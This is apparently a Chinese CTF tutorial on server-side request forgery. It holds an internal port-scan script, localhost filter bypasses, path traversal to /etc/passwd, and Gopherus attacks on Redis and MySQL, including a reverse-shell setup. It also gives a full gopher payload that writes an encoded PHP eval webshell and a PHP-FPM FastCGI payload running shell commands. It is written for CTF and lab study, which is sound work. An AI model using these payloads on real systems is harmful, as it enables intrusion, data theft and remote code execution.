浅谈ssrf与ctf那些事

# -*- coding: utf-8 -*-
import requests
import time
ports = ['80','6379','3306','8080','8000']
session = requests.Session();
for i in range(1, 255):
 ip = '192.168.0.%d' % i #内网ip地址
 for port in ports:
  url = 'http://ip/?url=http://%s:%s' %(ip,port)
  try:
   res = session.get(url,timeout=3)
   if len(res.text) != 0 :    #这里长度根据实际情况改
    print(ip,port,'is open')
  except:
   continue
print('Done')

nmap -sV ip
nmap -sV ip -p6379 //指定6379端口扫描

• 利用@绕过

http://www.baidu.com@127.0.0.1与http://127.0.0.1请求是相同的。

• 其他各种指向127.0.0.1的地址

1. http://localhost/
2. http://0/
3. http://[0:0:0:0:0:ffff:127.0.0.1]/
4. http://[::]:80/
5. http://127。0。0。1/
6. http://①②⑦.⓪.⓪.①
7. http://127.1/
8. http://127.00000.00000.001/

第1行localhost就是代指127.0.0.1

第2行中0在window下代表0.0.0.0，而在liunx下代表127.0.0.1

第3行指向127.0.0.1，在liunx下可用，window测试了下不行

第4行指向127.0.0.1，在liunx下可用，window测试了下不行

第5行用中文句号绕过

第6行用的是Enclosed alphanumerics方法绕过，英文字母以及其他一些可以网上找找

第7.8行中0的数量多一点少一点都没影响，最后还是会指向127.0.0.1

有关file_get_contents()函数的一个trick，可以看作是SSRF的一个黑魔法，当PHP的 file_get_contents() 函数在遇到不认识的伪协议头时候会将伪协议头当做文件夹，造成目录穿越漏洞，这时候只需不断往上跳转目录即可读到根目录的文件。

例子：

此处限制我们只能读https开头的路径，但利用这个特性我们可以构造：

httpsssss://

配合目录回退读取文件的两种方式：

httpsssss://../../../../../../etc/passwd
httpsssss://abc../../../../../../etc/passwd

这样做的目的就是可以在SSRF的众多协议被ban的情况下来进行读取文件。

在ctf.show月饼杯的web2_故人心就遇到这个点。

• readfile和parse_url解析差异

绕过端口：

我们在phpstudy中写下ssrf.php

可以看到check_inner_ip 通过 url_parse检测是否为内网ip，如果满足不是内网 ip ，通过 curl 请求 url 返回结果，这题就可以利用curl和parse_url解析的差异不同来绕过，让 parse_url 处理外部网站，最后 curl 请求内网网址。

最后的payload为

http://ip/challenge.php?url=http://@127.0.0.1:80%20@www.baidu.com/flag.php

有关URL的解析问题更加详细可参考：https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Redis一般都是绑定在6379端口，如果没有设置口令（默认是无），攻击者就可以通过SSRF漏洞未授权访问内网Redis，一般用来写入Crontab定时任务用来反弹shell，或者写入webshell等等。

在CTF题目中如果找到了内网的服务开了6379端口，一般来说就是Redis未授权访问漏洞，并且没有ban掉gopher://，可以用网上的脚本一把梭。这里推荐一个工具gopherus：https://github.com/tarunkant/Gopherus

• 写入shell

运行命令：

python gopherus.py --exploit redis

之后具体操作看图：

首先会让你选择ReverseShell/PHPShell，前者是反弹shell，后者是写入shell，这里我们选择写入shell，然后第二步让你选择默认目录，这里一般选择默认即可，第三步写入要执行的PHP代码。

在有SSRF漏洞的地方输入生成的payload—即gopher://127.0.0.1:6379后面一大段，接下来会在目录下生成shell.php。

要注意的是如果是在html的输入框中直接输入提交就行，但要在浏览器的URL输入的话，一定要记得URL编码一次。

相关例题：[GKCTF2020]EZ三剑客-EzWeb或者CTFHub中技能树->ssrf->redis

• 反弹shell

对于Redis服务一般还有通过写入定时任务来触发反弹shell的操作，可以使用上面的工具选择ReverseShell也可以一键生成payload

选择ReverseShell，然后写入你要反弹到的VPS的地址，因为这里监听端口工具写好是1234了，所以我们直接在VPS监听nc -lvp 1234即可。

因为我没有在CTF题目中利用过反弹shell这个点，这里就不演示过程了，至于复现过程的话可以在Weblgic靶场复现一下反弹shell，相关的文章讲解也有很多，这里不再赘述了。

如果内网开启了3306端口，存在没有密码的mysql，则也可以使用gopher协议进行ssrf攻击。

本地复现过程：

先在本地新建一个无密码的用户

CREATE USER 'kawhi'@'localhost';
GRANT ALL ON *.* TO 'kawhi'@'localhost';

运行完成之后可以打开phpmyadmin登录看看是否成功，然后这里比较简单的方法也是利用上述工具gopherus。

第一步写入用户的名字，第二步写入要查询的语句，将生成的payload再url编码一次，直接打。

可以看到成功读取到users表的信息，达到了我们mysql未授权访问数据的目的。

这种利用SSRF打mysql也曾经在CTF中出现过：ISITDTU 2018 Friss这道题，题目复现过程可参考：https://xz.aliyun.com/t/2500，这里就不赘述了。

SSRF漏洞是服务端请求伪造攻击，不论是GET或者是POST方法，都是为了达到一个目的，就是让服务端帮我们来执行请求。

那么在CTF中什么情况需要利用到这种方法呢，比如发现了一个内网的应用有上传的功能，我们需要通过POST提交数据，而且Gopher协议没有被ban，我们就可以考虑构造一个请求去打内网，下面先从本地看看如何构造：

通常，我们可以利用gopher://协议可以用来发送Get和Post请求，需要注意的点是要对发送的请求头中的空格和一些特殊字符进行url编码，如果是在URL中提交payload的时侯要再进行一次url编码，先来看看如何发送简单的请求。

• POST请求

在phpstudy写入1.php

直接我们上面的payload传入url，会发现没回显。

把gopher协议全部再url编码一遍就可以成功回显。

• GET请求：

GET请求发送和POST请求基本一样，这里就不再赘述了。

相关例题：2020强网杯half_infiltration

通过前面一系列操作获得ssrf.php

跑端口40000跑出来个登录框，然后有上传功能，参数file和content是上传文件

于是用gopher协议发送一个POST请求写马，payload如下：

gopher://127.0.0.1:40000/_POST /index.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=bv2afbkkbbpgkio8tjmai40ob7
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Connection: close

file=php://filter/%2577rite=string.rot13|convert.Base64-decode|convert.iconv.utf-7.utf-8/resource=1.php&content=K0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ

最后payload如下，传入参数需要注意二次url编码：

http://39.98.131.124/ssrf.php?we_have_done_ssrf_here_could_you_help_to_continue_it=gopher://127.0.0.1:40000/_POST%2520/index.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250ACookie%253A%2520PHPSESSID%253Dbv2afbkkbbpgkio8tjmai40ob7%250AContent-Length%253A%2520174%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AConnection%253A%2520close%250d%250A%250Afile%253Dphp%253A//filter/%25252577rite%253Dstring.rot13%257Cconvert.Base64-decode%257Cconvert.iconv.utf-7.utf-8/resource%253D1.php%2526content%253DK0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ

首先，PHP-FPM是实现和管理FastCGI的进程，是一个FastCGI协议解析器，而Fastcgi本质是一个通信协议，类似于HTTP，都是进行数据交换的一个通道，通信过程如下：

TCP模式下在本机监听一个端口（默认为9000），Nginx把客户端数据通过FastCGI协议传给9000端口，PHP-FPM拿到数据后会调用CGI进程解析。

而PHP-FPM攻击是通过伪造FastCGI协议包实现PHP代码执行，我们可以通过更改配置信息来执行任意代码。php中有两个非常有趣的配置项，（想了解更多关于php配置项，可以看我之前写的一篇文章：CTF中.htaccess文件的利用），分别为auto_prepend_file和auto_append_file，这两个配置项是使得php在执行目标文件之前，先包含配置项中指定的文件，如果我们把auto_prepend_file或auto_append_file的值设定为php://input，就能包含进POST提交的数据。

但是这里有个问题就是php://input需要开启allow_url_include，这里可以利用PHP_ADMIN_VALUE，上一篇说到PHP_ADMIN_VALUE不可以利用在.htaccess，但是FastCGI协议中PHP_ADMIN_VALUE却用来可以修改大部分的配置，我们利用PHP_ADMIN_VALUE把allow_url_include修改为True。

复现过程如下：

第一步：

现在liunx下启动一个监听并指定写入1.txt。

第二步：

这里使用P神写好的一个exp

https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

把代码保存为python文件，我这里为1.py，运行并-c写入要执行的php代码

python 1.py -c "" -p 9000 127.0.0.1 /usr/local/lib/php/PEAR.php

然后会生成一个1.txt文件

第三步：

将生成的1.txt文件双url编码，老生常谈，因为要在浏览器url输入必须要再编码一次，这里直接给出脚本，脚本我顺便加上了gopher协议等等可以直接打，如果题目ip不同可以自行更改。

import urllib.parse
f = open(r'1.txt','rb')
s = f.read()
s = urllib.parse.quote(s)
s = urllib.parse.quote(s)
print("gopher://127.0.0.1:9000/_"+s)

运行得到

gopher://127.0.0.1:9000/_%2501%2501E%25D3%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504E%25D3%2501%25E7%2500%2500%250E%2502CONTENT_LENGTH41%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%251BSCRIPT_FILENAME/usr/local/lib/php/PEAR.php%250B%251BSCRIPT_NAME/usr/local/lib/php/PEAR.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%251BREQUEST_URI/usr/local/lib/php/PEAR.php%2501%2504E%25D3%2500%2500%2500%2500%2501%2505E%25D3%2500%2529%2500%2500%253C%253Fphp%2520var_dump%2528shell_exec%2528%2527uname%2520-a%2527%2529%2529%253B%253F%253E%2501%2505E%25D3%2500%2500%2500%2500

这里我在CTFhub的FastCGI环境直接打了，当然本地也是可以的，可以看到我们下面的PHP代码成功包含并执行了。

有时候ssrf的过滤中会出现这种情况，通过对传入的url提取出host地址，然后进行dns解析，获取ip地址，然后对ip地址进行检验，如果合法再利用curl请求的时候会发起第二次请求。

DNS-rebinding就是利用第一次请求的时候解析的是合法的地址，而第二次解析的时候是恶意的地址，这个技术已经被广泛用于bypass同源策略，绕过ssrf的过滤等等。

利用过程：

首先需要拥有一个域名，然后添加两条记录类型为A的域名解析，一条的记录值为127.0.0.1，另一条随便写个外网地址即可

但是这种方法是随机解析的，所以只有在第一次解析出来是个外网ip，第二次解析出来是个内网ip才能成功，也就是说成功的概率为1/4。

这里我在CTFhub的DNS重绑定实验下直接演示：

如果没有域名的话，可以去平台http://ceye.io/上的dns rebinding工具，利用过程如下：

在profile下添加内网地址

这样的话是会随机返回地址的，也能完成DNS-rebinding攻击

关于更多的DNS-rebinding攻击利用方法见参考链接

在ctf中ssrf一般不会单独出题，大多数情况下是作为其中一个利用点，知识点看起来就那几个，总结起来还挺多的，由于水平有限，本篇可能还有一些点没有提到，比如赵总最近写了一个ssrf新的利用方法：https://www.zhaoj.in/read-6681.html，有兴趣可以看看。

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
http://www.bendawang.site/2017/05/31/%E5%85%B3%E4%BA%8EDNS-rebinding%E7%9A%84%E6%80%BB%E7%BB%93/